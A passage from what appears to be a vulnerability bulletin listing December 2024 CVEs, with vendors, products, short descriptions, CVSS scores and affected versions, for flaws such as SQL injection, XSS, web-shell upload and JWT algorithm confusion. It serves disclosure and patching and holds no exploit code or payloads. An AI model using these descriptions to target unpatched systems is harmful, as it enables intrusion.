A unrestricted upload of file with dangerous type vulnerability in epaper draft function in Corporate Training Management System before 10.13 allows remote authenticated users to bypass file upload restrictions and perform arbitrary system commands with SYSTEM privilege via a crafted ZIP file. | 2024-12-19 | 8.8 | CVE-2024-11984 |
| susheelhbti--Saksh Escrow System |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in susheelhbti Saksh Escrow System allows SQL Injection.This issue affects Saksh Escrow System: from n/a through 2.4. | 2024-12-18 | 8.5 | CVE-2024-55984 |
| sweetdaisy86--CRM WordPress Plugin RepairBuddy |
The CRM WordPress Plugin - RepairBuddy plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.8120. This is due to the plugin not properly validating a user's identity prior to updating their email through the wc_update_user_data AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account. | 2024-12-18 | 8.8 | CVE-2024-12259 |
| Synology--Media Server |
Authorization bypass through user-controlled key vulnerability in streaming service in Synology Media Server before 1.4-2680, 2.0.5-3152 and 2.2.0-3325 allows remote attackers to read specific files via unspecified vectors. | 2024-12-18 | 7.5 | CVE-2024-4464 |
| telerik -- ui_for_wpf |
In Progress Telerik UI for WPF versions prior to 2024 Q4 (2024.4.1213), a code execution attack is possible through an insecure deserialization vulnerability. | 2024-12-16 | 8.4 | CVE-2024-10095 |
| theDotstore--Advance Menu Manager |
Missing Authorization vulnerability in theDotstore Advance Menu Manager.This issue affects Advance Menu Manager: from n/a through 3.1.1. | 2024-12-18 | 7.1 | CVE-2024-54381 |
| ThemeHunk--Zita Site Builder |
Missing Authorization vulnerability in ThemeHunk Zita Site Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Zita Site Builder: from n/a through 1.0.2. | 2024-12-16 | 9.1 | CVE-2024-54369 |
| Thomas Hoefter--Onlywire Multi Autosubmitter |
Cross-Site Request Forgery (CSRF) vulnerability in Thomas Hoefter Onlywire Multi Autosubmitter allows Stored XSS.This issue affects Onlywire Multi Autosubmitter: from n/a through 1.2.4. | 2024-12-16 | 7.1 | CVE-2024-54435 |
| ThreatQuotient--ThreatQ |
In ThreatQuotient ThreatQ before 5.29.3, authenticated users are able to execute arbitrary commands by sending a crafted request to an API endpoint. | 2024-12-18 | 8.8 | CVE-2024-39703 |
| Tibbo--AggreGate Network Manager |
There is an unrestricted file upload vulnerability where it is possible for an authenticated user (low privileged) to upload an jsp shell and execute code with the privileges of user running the web server. | 2024-12-19 | 8.8 | CVE-2024-12700 |
| Toby Cox--SOPA Blackout |
Cross-Site Request Forgery (CSRF) vulnerability in Toby Cox SOPA Blackout allows Stored XSS.This issue affects SOPA Blackout: from n/a through 1.4. | 2024-12-16 | 7.1 | CVE-2024-54410 |
| Tom Royal--Stop Registration Spam |
Cross-Site Request Forgery (CSRF) vulnerability in Tom Royal Stop Registration Spam allows Stored XSS.This issue affects Stop Registration Spam: from n/a through 1.23. | 2024-12-16 | 7.1 | CVE-2024-56017 |
| Turcu Ciprian--Advanced Fancybox |
Cross-Site Request Forgery (CSRF) vulnerability in Turcu Ciprian Advanced Fancybox allows Stored XSS.This issue affects Advanced Fancybox: from n/a through 1.1.1. | 2024-12-16 | 7.1 | CVE-2024-54401 |
| Velocidex--WinPmem |
Velocidex WinPmem versions below 4.1 suffer from an Out of Bounds Write vulnerability. By using an IO Control, a user space program can trick the driver into writing a 0 into any chosen memory location. In conjunction with information leakage from the WinPmem driver, attackers can discover the location in memory for the g_CiOptions global symbol. This can be leveraged to disable signed driver enforcement on the target system - allowing attackers to load unsigned drivers. | 2024-12-16 | 8.2 | CVE-2024-12668 |
| Velocidex--WinPmem |
Velocidex WinPmem versions 4.1 and below suffer from an Improper Input Validation vulnerability whereby an attacker with admin access can trigger a BSOD with a parallel thread changing the memory's access right under the control of the user-mode application. This is due to verification only being performed at the beginning of the routine allowing the userspace to change page permissions half way through the routine. A valid workaround is a rule to detect unauthorized loading of winpmem outside incident response operations. | 2024-12-16 | 7.3 | CVE-2024-10972 |
| vercel--next.js |
Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability. | 2024-12-17 | 7.5 | CVE-2024-51479 |
| VibeThemes--WPLMS |
Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.3. | 2024-12-18 | 9.9 | CVE-2024-56050 |
| VibeThemes--WPLMS |
Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2. | 2024-12-18 | 9.9 | CVE-2024-56052 |
| VibeThemes--WPLMS |
Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2. | 2024-12-18 | 9.1 | CVE-2024-56054 |
| VibeThemes--WPLMS |
Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2. | 2024-12-18 | 9.9 | CVE-2024-56057 |
| VibeThemes--WPLMS |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3. | 2024-12-18 | 8.5 | CVE-2024-56047 |
| VibeThemes--WPLMS |
Missing Authorization vulnerability in VibeThemes WPLMS allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WPLMS: from n/a through 1.9.9. | 2024-12-18 | 8.8 | CVE-2024-56048 |
| VibeThemes--WPLMS |
Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5.2. | 2024-12-18 | 8.5 | CVE-2024-56049 |
| VibeThemes--WPLMS |
Improper Control of Generation of Code ('Code Injection') vulnerability in VibeThemes WPLMS allows Code Injection.This issue affects WPLMS: from n/a before 1.9.9.5. | 2024-12-18 | 8.5 | CVE-2024-56051 |
| VibeThemes--WPLMS |
Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5.2. | 2024-12-18 | 8.5 | CVE-2024-56055 |
| VibeThemes--WPLMS |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3. | 2024-12-18 | 7.6 | CVE-2024-56053 |
| vivo--ABE |
Due to the flaws in the verification of input parameters, the attacker can input carefully constructed commands to make the ABE service execute some commands with root privilege. | 2024-12-17 | 7 | CVE-2020-12487 |
| vivo--Permission manager module |
Locally installed application can bypass the permission check and perform system operations that require permission. | 2024-12-17 | 7.9 | CVE-2021-26280 |
| WalletStation.com--Code Generator Pro |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WalletStation.com Code Generator Pro allows SQL Injection.This issue affects Code Generator Pro: from n/a through 1.2. | 2024-12-16 | 9.3 | CVE-2024-55978 |
| Web solution soft--Mandrill WP |
Cross-Site Request Forgery (CSRF) vulnerability in Web solution soft Mandrill WP allows Stored XSS.This issue affects Mandrill WP: from n/a through 1.0.5. | 2024-12-16 | 7.1 | CVE-2024-54394 |
| webbuilder143--Custom Product Tabs For WooCommerce |
The Custom Product Tabs For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.4 via deserialization of untrusted input from the 'wb_custom_tabs' parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2024-12-21 | 7.2 | CVE-2024-12721 |
| Webriderz--Wr Age Verification |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webriderz Wr Age Verification allows SQL Injection.This issue affects Wr Age Verification: from n/a through 2.0.0. | 2024-12-16 | 9.3 | CVE-2024-55980 |
| Webriderz--Wr Age Verification |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webriderz Wr Age Verification allows SQL Injection.This issue affects Wr Age Verification: from n/a through 2.0.0. | 2024-12-16 | 8.5 | CVE-2024-55979 |
| WofficeIO--Woffice |
Authentication Bypass Using an Alternate Path or Channel vulnerability in WofficeIO Woffice allows Authentication Bypass.This issue affects Woffice: from n/a through 5.4.14. | 2024-12-16 | 9.8 | CVE-2024-43234 |
| woodruffw--pyrage |
pyrage is a set of Python bindings for the rage file encryption library (age in Rust). `pyrage` uses the Rust `age` crate for its underlying operations, and `age` is vulnerable to GHSA-4fg7-vxc8-qx5w. All details of GHSA-4fg7-vxc8-qx5w are relevant to `pyrage` for the versions specified in this advisory. See GHSA-4fg7-vxc8-qx5w for full details. Versions of `pyrage` before 1.2.0 lack plugin support and are therefore **not affected**. An equivalent issue was fixed in [the reference Go implementation of age](https://github.com/FiloSottile/age), see advisory GHSA-32gq-x56h-299c. This issue has been addressed in version 1.2.3 and all users are advised to update. There are no known workarounds for this vulnerability. | 2024-12-19 | 9.8 | CVE-2024-56327 |
| Wovax, LLC.--Wovax IDX |
Authentication Bypass Using an Alternate Path or Channel vulnerability in Wovax, LLC. Wovax IDX allows Authentication Bypass.This issue affects Wovax IDX: from n/a through 1.2.2. | 2024-12-16 | 8.8 | CVE-2024-56013 |
| wpclever--WPC Shop as a Customer for WooCommerce |
The WPC Shop as a Customer for WooCommerce plugin for WordPress is vulnerable to account takeover and privilege escalation in all versions up to, and including, 1.2.8. This is due to the 'generate_key' function not producing a sufficiently random value. This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as site administrators, granted they have triggered the ajax_login() function which generates a unique key that can be used to log in. | 2024-12-18 | 8.1 | CVE-2024-12432 |
| WPFactory--WP Currency Exchange Rates |
Cross-Site Request Forgery (CSRF) vulnerability in WPFactory WP Currency Exchange Rates allows Stored XSS.This issue affects WP Currency Exchange Rates: from n/a through 1.2.0. | 2024-12-16 | 7.1 | CVE-2024-54332 |
| WPGear--Hack-Info |
Cross-Site Request Forgery (CSRF) vulnerability in WPGear Hack-Info allows Stored XSS.This issue affects Hack-Info: from n/a through 3.17. | 2024-12-16 | 7.1 | CVE-2024-54353 |
| WPNERD--WP-NERD Toolkit |
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPNERD WP-NERD Toolkit.This issue affects WP-NERD Toolkit: from n/a through 1.1. | 2024-12-16 | 7.5 | CVE-2024-54279 |
| WPTooling--Image Mapper |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPTooling Image Mapper allows Reflected XSS.This issue affects Image Mapper: from n/a through 0.2.5.3. | 2024-12-18 | 7.1 | CVE-2024-56016 |
| wpweb--WooCommerce PDF Vouchers |
Incorrect Privilege Assignment vulnerability in wpweb WooCommerce PDF Vouchers allows Privilege Escalation.This issue affects WooCommerce PDF Vouchers: from n/a before 4.9.9. | 2024-12-18 | 9.8 | CVE-2024-54383 |
| X1a0He--Adobe Downloader |
A vulnerability, which was classified as critical, was found in X1a0He Adobe Downloader up to 1.3.1 on macOS. Affected is the function shouldAcceptNewConnection of the file com.x1a0he.macOS.Adobe-Downloader.helper of the component XPC Service. The manipulation leads to improper privilege management. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. This product is not affiliated with the company Adobe. | 2024-12-19 | 7.8 | CVE-2024-12786 |
| xmidt-org--cjwt |
cjwt is a C JSON Web Token (JWT) Implementation. Algorithm confusion occurs when a system improperly verifies the type of signature used, allowing attackers to exploit the lack of distinction between signing methods. If the system doesn't differentiate between an HMAC signed token and an RS/EC/PS signed token during verification, it becomes vulnerable to this kind of attack. For instance, an attacker could craft a token with the alg field set to "HS256" while the server expects an asymmetric algorithm like "RS256". The server might mistakenly use the wrong verification method, such as using a public key as the HMAC secret, leading to unauthorised access. For RSA, the key can be computed from a few signatures. For Elliptic Curve (EC), two potential keys can be recovered from one signature. This can be used to bypass the signature mechanism if an application relies on asymmetrically signed tokens. This issue has been addressed in version 2.3.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-19 | 9.1 | CVE-2024-54150 |
| ydesignservices--YDS Support Ticket System |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ydesignservices YDS Support Ticket System allows SQL Injection.This issue affects YDS Support Ticket System: from n/a through 1.0. | 2024-12-18 | 8.5 | CVE-2024-55985 |
| zephyrproject-rtos--Zephyr |
No proper validation of the length of user input in olcp_ind_handler in zephyr/subsys/bluetooth/services/ots/ots_client.c. | 2024-12-16 | 7.5 | CVE-2024-8798 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| n/a--n/a |
Missing Authorization vulnerability in allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects : from n/a through 2.0.5. | 2024-12-16 | 4.3 | CVE-2024-55994 |
| aasthasolutions--Particle Background |
The Particle Background plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'particleground' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-11775 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 5.5 | CVE-2022-44515 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 5.5 | CVE-2022-44516 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 5.5 | CVE-2022-44517 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by a use-after-free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 5.5 | CVE-2022-44519 |
| Adobe--Acrobat Reader |
Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 5.5 | CVE-2023-21586 |
| Agency Dominion--Fusion |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Agency Dominion Fusion allows Stored XSS.This issue affects Fusion: from n/a through 1.6.1. | 2024-12-19 | 6.5 | CVE-2024-37962 |
| Aiven-Open--pghoard |
pghoard is a PostgreSQL backup daemon and restore tooling that stores backup data in cloud object stores. A vulnerability has been discovered that could allow an attacker to acquire disk access with privileges equivalent to those of pghoard, allowing for unintended path traversal. Depending on the permissions/privileges assigned to pghoard, this could allow disclosure of sensitive information. This issue has been addressed in releases after 2.2.2a. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-17 | 6.5 | CVE-2024-56142 |
| aklaren--ScanCircle |
The ScanCircle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'scancircle' shortcode in all versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-18 | 6.4 | CVE-2024-11439 |
| Alex W Fowler--Easy Site Importer |
Missing Authorization vulnerability in Alex W Fowler Easy Site Importer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Site Importer: from n/a through 1.0.1. | 2024-12-16 | 5.4 | CVE-2024-56004 |
| amitwpdeveloper--WooCommerce Additional Fees On Checkout (Free) |
The WooCommerce Additional Fees On Checkout (Free) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'number' parameter in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-17 | 6.1 | CVE-2024-12395 |
| Apache Software Foundation--Apache Kafka |
Incorrect Implementation of Authentication Algorithm in Apache Kafka's SCRAM implementation. Issue Summary: Apache Kafka's implementation of the Salted Challenge Response Authentication Mechanism (SCRAM) did not fully adhere to the requirements of RFC 5802 [1]. Specifically, as per RFC 5802, the server must verify that the nonce sent by the client in the second message matches the nonce sent by the server in its first message. However, Kafka's SCRAM implementation did not perform this validation. Impact: This vulnerability is exploitable only when an attacker has plaintext access to the SCRAM authentication exchange. However, the usage of SCRAM over plaintext is strongly discouraged as it is considered an insecure practice [2]. Apache Kafka recommends deploying SCRAM exclusively with TLS encryption to protect SCRAM exchanges from interception [3]. Deployments using SCRAM with TLS are not affected by this issue. How to Detect If You Are Impacted: If your deployment uses SCRAM authentication over plaintext communication channels (without TLS encryption), you are likely impacted. To check if TLS is enabled, review your server.properties configuration file for listeners property. If you have SASL_PLAINTEXT in the listeners, then you are likely impacted. Fix Details: The issue has been addressed by introducing nonce verification in the final message of the SCRAM authentication exchange to ensure compliance with RFC 5802. Affected Versions: Apache Kafka versions 0.10.2.0 through 3.9.0, excluding the fixed versions below. Fixed Versions: 3.9.0 3.8.1 3.7.2 Users are advised to upgrade to 3.7.2 or later to mitigate this issue. Recommendations for Mitigation: Users unable to upgrade to the fixed versions can mitigate the issue by: - Using TLS with SCRAM Authentication: Always deploy SCRAM over TLS to encrypt authentication exchanges and protect against interception. - Considering Alternative Authentication Mechanisms: Evaluate alternative authentication mechanisms, such as PLAIN, Kerberos or OAuth with TLS, which provide additional layers of security. | 2024-12-18 | 5.3 | CVE-2024-56128 |
| Apache Software Foundation--Apache Tomcat |
Uncontrolled Resource Consumption vulnerability in the examples web application provided with Apache Tomcat leads to denial of service. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.9.97. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue. | 2024-12-17 | 5.3 | CVE-2024-54677 |
| Apple--macOS |
A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.1. An app may be able to access sensitive user data. | 2024-12-20 | 5.5 | CVE-2024-44292 |
| Apple--macOS |
A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.1. A user may be able to view sensitive user information. | 2024-12-20 | 5.5 | CVE-2024-44293 |
| Apple--macOS |
A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.1. An app may be able to access information about a user's contacts. | 2024-12-20 | 5.5 | CVE-2024-44298 |
| arothman--PCRecruiter Extensions |
The PCRecruiter Extensions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PCRecruiter' shortcode in all versions up to, and including, 1.4.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-11776 |
| averta--Shortcodes and extra features for Phlox theme |
The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Staff widget in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-21 | 6.4 | CVE-2024-12588 |
| averta--Shortcodes and extra features for Phlox theme |
The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aux_contact_box and aux_gmaps shortcodes in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-21 | 6.4 | CVE-2024-9545 |
| Bastien Ho--EELV Newsletter |
Cross-Site Request Forgery (CSRF) vulnerability in Bastien Ho EELV Newsletter allows Cross Site Request Forgery.This issue affects EELV Newsletter: from n/a through 4.8.2. | 2024-12-16 | 5.4 | CVE-2024-54430 |
| bdthemes--Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) |
The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_layouts() function in all versions up to, and including, 5.10.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain a detailed listing of layout templates. | 2024-12-22 | 4.3 | CVE-2024-11852 |
| Beat Kueffer--Termin-Kalender |
Missing Authorization vulnerability in Beat Kueffer Termin-Kalender allows Stored XSS.This issue affects Termin-Kalender: from n/a through 0.99.47. | 2024-12-16 | 6.5 | CVE-2024-54354 |
| BeyondTrust--Remote Support(RS) & Privileged Remote Access(PRA) |
A vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) which can allow an attacker with existing administrative privileges to inject commands and run as a site user. | 2024-12-18 | 6.6 | CVE-2024-12686 |
| BoldThemes--Bold Page Builder |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in BoldThemes Bold Page Builder allows Path Traversal.This issue affects Bold Page Builder: from n/a through 5.1.5. | 2024-12-16 | 4.9 | CVE-2024-54382 |
| bplugins--Button Block Get fully customizable & multi-functional buttons |
The Button Block - Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via the 'btn_block_duplicate_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts. | 2024-12-19 | 4.3 | CVE-2024-12560 |
| brandtoss--WP Mailster |
Cross-Site Request Forgery (CSRF) vulnerability in brandtoss WP Mailster allows Cross Site Request Forgery.This issue affects WP Mailster: from n/a through 1.8.17.0. | 2024-12-16 | 4.3 | CVE-2024-54355 |
| carlosfrancopkt1--PKT1 Centro de envios |
The PKT1 Centro de envios plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'success' and 'error' parameters in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-20 | 6.1 | CVE-2024-11806 |
| chrisbadgett--LifterLMS WP LMS for eLearning, Online Courses, & Quizzes |
The LifterLMS - WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to arbitrary post deletion due to a missing capability check on the 'llms_delete_cert' action in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts. | 2024-12-18 | 4.3 | CVE-2024-12596 |
| Chunghwa Telecom--topm-client |
The topm-client from Chunghwa Telecom has an Arbitrary File Read vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection for the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains a Relative Path Traversal vulnerability, allowing attackers to read arbitrary files on the user's system. | 2024-12-16 | 6.5 | CVE-2024-12645 |
| classcms -- classcms |
A vulnerability has been found in ClassCMS up to 4.8 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin?do=admin:user:editPost of the component User Management Page. The manipulation leads to improper handling of insufficient privileges. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-16 | 4.7 | CVE-2024-12666 |
| code-projects--Job Recruitment |
A vulnerability was found in code-projects Job Recruitment 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /_email.php. The manipulation of the argument email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-21 | 4.3 | CVE-2024-12883 |
| code-projects--Online Exam Mastering System |
A vulnerability was found in code-projects Online Exam Mastering System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /update.php?q=quiz&step=2. The manipulation of the argument eid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-22 | 6.3 | CVE-2024-12890 |
| code-projects--Online Exam Mastering System |
A vulnerability classified as critical has been found in code-projects Online Exam Mastering System 1.0. Affected is an unknown function of the file /account.php?q=quiz&step=2. The manipulation of the argument eid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-22 | 6.3 | CVE-2024-12891 |
| codename065--Download Manager |
The Download Manager plugin for WordPress is vulnerable to unauthorized download of password-protected content due to improper password validation on the checkFilePassword function in all versions up to, and including, 3.3.03. This makes it possible for unauthenticated attackers to download password-protected files. | 2024-12-19 | 5.3 | CVE-2024-11768 |
| codepeople--Calculated Fields Form |
The Calculated Fields Form plugin for WordPress is vulnerable to Denial of Service in all versions up to, and including, 5.2.63. This is due to unlimited height and width parameters for CAPTCHA images. This makes it possible for unauthenticated attackers to send multiple requests with large values, resulting in slowing server resources if the server does not mitigate Denial of Service attacks. | 2024-12-17 | 5.3 | CVE-2024-12601 |
| Codezips--E-Commerce Site |
A vulnerability, which was classified as critical, was found in Codezips E-Commerce Site 1.0. This affects an unknown part of the file /admin/editorder.php. The manipulation of the argument dstatus/quantity/ddate leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 6.3 | CVE-2024-12794 |
| crmperks--CRM Perks WordPress HelpDesk Integration Zendesk, Freshdesk, HelpScout |
The CRM Perks - WordPress HelpDesk Integration - Zendesk, Freshdesk, HelpScout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'crm-perks-tickets' shortcode in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-16 | 6.4 | CVE-2024-12443 |
| cswaim--TPG Get Posts |
The TPG Get Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tpg_get_posts' shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-17 | 6.4 | CVE-2024-11906 |
| cyberlord92--Broken Link Checker | Finder |
The Broken Link Checker | Finder plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the 'moblc_check_link' function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2024-12-19 | 5.4 | CVE-2024-12121 |
| cyberlord92--Page Restriction WordPress (WP) Protect WP Pages/Post |
The Page Restriction WordPress (WP) - Protect WP Pages/Post plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.6 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2024-12-20 | 5.3 | CVE-2024-11297 |
| Dave Kiss--Vimeography |
Generation of Error Message Containing Sensitive Information vulnerability in Dave Kiss Vimeography allows Retrieve Embedded Sensitive Data.This issue affects Vimeography: from n/a through 2.4.4. | 2024-12-16 | 5.3 | CVE-2024-54366 |
| David Cramer--Caldera SMTP Mailer |
Missing Authorization vulnerability in David Cramer Caldera SMTP Mailer.This issue affects Caldera SMTP Mailer: from n/a through 1.0.1. | 2024-12-16 | 4.3 | CVE-2024-56003 |
| Dell--AppSync |
Dell AppSync, version 4.6.0.x, contain a Symbolic Link (Symlink) Following vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information tampering. | 2024-12-17 | 4.4 | CVE-2024-52542 |
| Digital Operation Services--WiFiBurada |
Authentication Bypass by Assumed-Immutable Data vulnerability in Digital Operation Services WiFiBurada allows Manipulating User-Controlled Variables.This issue affects WiFiBurada: before 1.0.5. | 2024-12-17 | 6.5 | CVE-2024-8475 |
| Digital Operation Services--WiFiBurada |
Improper Restriction of Excessive Authentication Attempts vulnerability in Digital Operation Services WiFiBurada allows Use of Known Domain Credentials.This issue affects WiFiBurada: before 1.0.5. | 2024-12-17 | 4.3 | CVE-2024-8429 |
| discourse--discourse |
